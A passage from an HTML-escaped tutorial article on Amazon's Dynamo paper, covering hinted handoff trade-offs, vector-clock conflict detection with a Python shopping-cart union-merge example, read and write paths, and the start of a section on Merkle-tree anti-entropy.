&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  The Trade-off
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✓ Maximum write availability&lt;/li&gt;
&lt;li&gt;✓ Durability maintained during failures&lt;/li&gt;
&lt;li&gt;✓ Automatic recovery when nodes come back&lt;/li&gt;
&lt;li&gt;✓ No manual intervention required&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Costs:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✗ Temporary inconsistency (data not on "correct" nodes)&lt;/li&gt;
&lt;li&gt;✗ Extra storage for hints database&lt;/li&gt;
&lt;li&gt;✗ Background bandwidth for hint transfers&lt;/li&gt;
&lt;li&gt;✗ Slightly more complex code&lt;/li&gt;
&lt;li&gt;✗ &lt;strong&gt;Hinted handoff provides temporary durability, not permanent replication.&lt;/strong&gt; If a substitute node (like D) fails before it can transfer its hint back to B, the number of true replicas drops below N until the situation resolves. This is an important edge case to understand in failure planning.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Amazon's verdict:&lt;/strong&gt; The availability benefits far outweigh the costs for e-commerce workloads.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conflict Resolution: The Shopping Cart Problem
&lt;/h2&gt;

&lt;p&gt;Let's talk about the most famous example from the paper: the shopping cart. This is where rubber meets road.&lt;/p&gt;

&lt;h3&gt;
  
  
  What Is a Conflict (and Why Does It Happen)?
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;conflict&lt;/strong&gt; occurs when two writes happen to the same key on different nodes, without either write "knowing about" the other. This is only possible because Dynamo accepts writes even when nodes can't communicate—which is the whole point!&lt;/p&gt;

&lt;p&gt;Here's a concrete sequence of events that creates a conflict:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Timeline:
T=0:  Customer logs in. Cart has {shoes} on all 3 nodes.
T=1:  Network partition: Node1 can't talk to Node2.
T=2:  Customer adds {jacket} on their laptop → goes to Node1.
      Cart on Node1: {shoes, jacket}   ← Vector clock: [N1:2]
T=3:  Customer adds {hat} on their phone → goes to Node2.
      Cart on Node2: {shoes, hat}      ← Vector clock: [N2:2]
T=4:  Network heals. Node1 and Node2 compare notes.
      Node1 says: "I have version [N1:2]"
      Node2 says: "I have version [N2:2]"
      Neither clock dominates the other → CONFLICT!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Neither version is "wrong"—both represent real actions the customer took. Dynamo's job is to detect this situation (via vector clocks) and surface &lt;strong&gt;both versions&lt;/strong&gt; to the application so the application can decide what to do.&lt;/p&gt;

&lt;h3&gt;
  
  
  What Does the Application Do With a Conflict?
&lt;/h3&gt;

&lt;p&gt;This is the crucial part that the paper delegates to you: &lt;strong&gt;the application must resolve conflicts using business logic&lt;/strong&gt;. Dynamo gives you all the concurrent versions; your code decides how to merge them.&lt;/p&gt;

&lt;p&gt;For the shopping cart, Amazon chose a &lt;strong&gt;union merge&lt;/strong&gt;: keep all items from all concurrent versions. The rationale is simple—losing an item from a customer's cart (missing a sale) is worse than occasionally showing a stale item they already deleted.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Conflict versions:
  Version A (from Node1): {shoes, jacket}
  Version B (from Node2): {shoes, hat}

Merge strategy: union
  Merged cart: {shoes, jacket, hat}  ← All items preserved
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2t1c9gnz6aklthq3y27.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2t1c9gnz6aklthq3y27.png" alt="image" width="800" height="1306"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the actual reconciliation code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;__future__&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;annotations&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;dataclasses&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;dataclass&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;field&lt;/span&gt;


&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;copy&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;merge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Merged clock = max of each node&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s counter across both versions.&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;all_keys&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;merged&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;max&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;k&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;all_keys&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;merged&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__repr__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock(&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;


&lt;span class="nd"&gt;@dataclass&lt;/span&gt;
&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;ShoppingCart&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;field&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;default_factory&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;VectorClock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;field&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;default_factory&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nd"&gt;@staticmethod&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;carts&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ShoppingCart&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ShoppingCart&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;carts&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;carts&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;  &lt;span class="c1"&gt;# No conflict, nothing to do
&lt;/span&gt;
        &lt;span class="c1"&gt;# Merge strategy: union of all items (never lose additions).
&lt;/span&gt;        &lt;span class="c1"&gt;# This is Amazon's choice for shopping carts.
&lt;/span&gt;        &lt;span class="c1"&gt;# A different application might choose last-write-wins or something else.
&lt;/span&gt;        &lt;span class="n"&gt;all_items&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;merged_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;cart&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;carts&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;all_items&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cart&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;          &lt;span class="c1"&gt;# Union: keep everything
&lt;/span&gt;            &lt;span class="n"&gt;merged_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;merged_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;merge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cart&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;ShoppingCart&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;sorted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;all_items&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;merged_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;


&lt;span class="c1"&gt;# Example conflict scenario
&lt;/span&gt;&lt;span class="n"&gt;cart1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;ShoppingCart&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;shoes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;jacket&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;N1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;}))&lt;/span&gt;
&lt;span class="n"&gt;cart2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;ShoppingCart&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;shoes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hat&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;    &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;N2&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;}))&lt;/span&gt;

&lt;span class="c1"&gt;# Dynamo detected a conflict and passes both versions to our reconcile()
&lt;/span&gt;&lt;span class="n"&gt;reconciled&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ShoppingCart&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;reconcile&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="n"&gt;cart1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cart2&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;reconciled&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# ['hat', 'jacket', 'shoes'] — union!
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The Deletion Problem (Why This Gets Tricky)
&lt;/h3&gt;

&lt;p&gt;The union strategy has a nasty edge case: &lt;strong&gt;deleted items can come back from the dead&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;T=0:  Cart: {shoes, hat}
T=1:  Customer removes hat → Cart: {shoes}           Clock: [N1:3]
T=2:  Network partition — Node2 still has old state
T=3:  Some concurrent write to Node2                  Clock: [N2:3]
T=4:  Network heals → conflict detected
T=5:  Union merge: {shoes} ∪ {shoes, hat} = {shoes, hat}

Result: Hat is BACK! Customer removed it, but it reappeared.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Amazon explicitly accepts this trade-off. A "ghost" item in a cart is a minor annoyance. Losing a cart addition during a Black Friday sale is lost revenue.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Engineering depth note&lt;/strong&gt;: Merge logic must be domain-specific and carefully designed. Adding items is commutative (order doesn't matter) and easy to merge. Removing items is not—a deletion in one concurrent branch may be silently ignored during a union-based merge. This is an intentional trade-off in Dynamo's design, but it means the application must reason carefully about add vs. remove semantics. If your data doesn't naturally support union merges (e.g., a counter, a user's address), you need a different strategy—such as CRDTs, last-write-wins with timestamps, or simply rejecting concurrent writes for that data type.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Read and Write Flow
&lt;/h2&gt;

&lt;p&gt;The diagrams above show the high-level flow, but let's walk through what actually happens step-by-step during a read and a write. Understanding this concretely will make the earlier concepts click.&lt;/p&gt;

&lt;h3&gt;
  
  
  Write Path
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Step-by-step narration of a PUT request:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Client sends the request&lt;/strong&gt; to any node (via a load balancer) or directly to the coordinator.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The coordinator is determined&lt;/strong&gt; — this is the first node in the preference list for the key's hash position on the ring.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vector clock is updated&lt;/strong&gt; — the coordinator increments its own counter in the vector clock, creating a new version.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The coordinator writes locally&lt;/strong&gt;, then fans out the write to the other N-1 nodes in the preference list simultaneously.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The coordinator waits for W acknowledgments.&lt;/strong&gt; It does NOT wait for all N — just the first W to respond. The remaining nodes that haven't responded yet will get the write eventually (or via hinted handoff if they're down).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Once W ACKs arrive, the coordinator returns 200 OK&lt;/strong&gt; to the client. From the client's perspective, the write is done.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc1huhmo7yy7mgc5fhxpt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc1huhmo7yy7mgc5fhxpt.png" alt="image" width="638" height="2044"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key insight about the write path&lt;/strong&gt;: The client gets a success response as soon as W nodes confirm. The other (N - W) nodes will receive the write asynchronously. This is why the system is "eventually consistent"—all nodes &lt;em&gt;will&lt;/em&gt; have the data, just not necessarily at the same moment.&lt;/p&gt;

&lt;h3&gt;
  
  
  Read Path
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Step-by-step narration of a GET request:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Client sends the request&lt;/strong&gt; to the coordinator for that key.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The coordinator sends read requests to all N nodes&lt;/strong&gt; in the preference list simultaneously (not just R). This is important — it contacts all N, but only needs R to respond.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Wait for R responses.&lt;/strong&gt; The coordinator returns as soon as R nodes have replied, without waiting for the slower ones.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compare the versions returned.&lt;/strong&gt; The coordinator checks all the vector clocks:

&lt;ul&gt;
&lt;li&gt;If all versions are identical → return the single version immediately.&lt;/li&gt;
&lt;li&gt;If one version's clock dominates the others (it's causally "newer") → return that version.&lt;/li&gt;
&lt;li&gt;If versions are concurrent (neither clock dominates) → return &lt;strong&gt;all versions&lt;/strong&gt; to the client, which must merge them.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Read repair&lt;/strong&gt; happens in the background: if the coordinator noticed any node returned a stale version, it sends the latest version to that node to bring it up to date.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdyhzld5b2djtdyvmoold.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdyhzld5b2djtdyvmoold.png" alt="image" width="800" height="1102"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why does the client receive the conflict instead of the coordinator resolving it?&lt;/strong&gt; Because Dynamo is a general-purpose storage engine. It doesn't know whether you're storing a shopping cart, a user profile, or a session token. Only &lt;em&gt;your application&lt;/em&gt; knows how to merge two conflicting versions in a way that makes business sense. The coordinator hands you the raw concurrent versions along with the vector clock context, and you do the right thing for your use case.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The vector clock context is the key to closing the loop&lt;/strong&gt;: when the client writes the merged version back, it must include the context (the merged vector clock). This tells Dynamo that the new write has "seen" all the concurrent versions, so the conflict is resolved. Without this context, Dynamo might think it's &lt;em&gt;another&lt;/em&gt; concurrent write on top of the still-unresolved conflict.&lt;/p&gt;

&lt;h2&gt;
  
  
  Merkle Trees for Anti-Entropy
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: How Do You Know When Replicas Are Out of Sync?
&lt;/h3&gt;

&lt;p&gt;After a node recovers from a failure, it may have missed some writes. After a network partition heals, two replicas might diverge. How does Dynamo detect and fix these differences?&lt;/p&gt;

&lt;p&gt;The brute-force approach would be: "Every hour, compare every key on Node A against Node B, and sync anything that's different." But at Amazon's scale, a single node might store hundreds of millions of keys. Comparing them all one by one would be so slow and bandwidth-intensive that it would interfere with normal traffic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dynamo uses Merkle trees to solve this efficiently.&lt;/strong&gt; The core idea: instead of comparing individual keys, compare &lt;em&gt;hashes of groups of keys&lt;/em&gt;. If the hash matches, that whole group is identical—skip it. Only drill down into groups where hashes differ.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important&lt;/strong&gt;: Merkle tree sync is a &lt;strong&gt;background anti-entropy&lt;/strong&gt; mechanism. It's not on the hot read/write path. Normal reads and writes use vector clocks and quorums for versioning. Merkle trees are for the repair process that runs periodically in the background to catch any inconsistencies that slipped through.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  How a Merkle Tree Is Built
&lt;/h3&gt;

&lt;p&gt;Each node builds a Merkle tree over its data, organized by key ranges:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Leaf nodes&lt;/strong&gt; contain the hash of a small range of actual data keys (e.g., hash of all values for keys k1, k2, k3).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Internal nodes&lt;/strong&gt; contain the hash of their children's hashes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The root&lt;/strong&gt; is a single hash representing &lt;em&gt;all&lt;/em&gt; the data on the node.&lt;/li&gt;
&lt;/ol&gt;

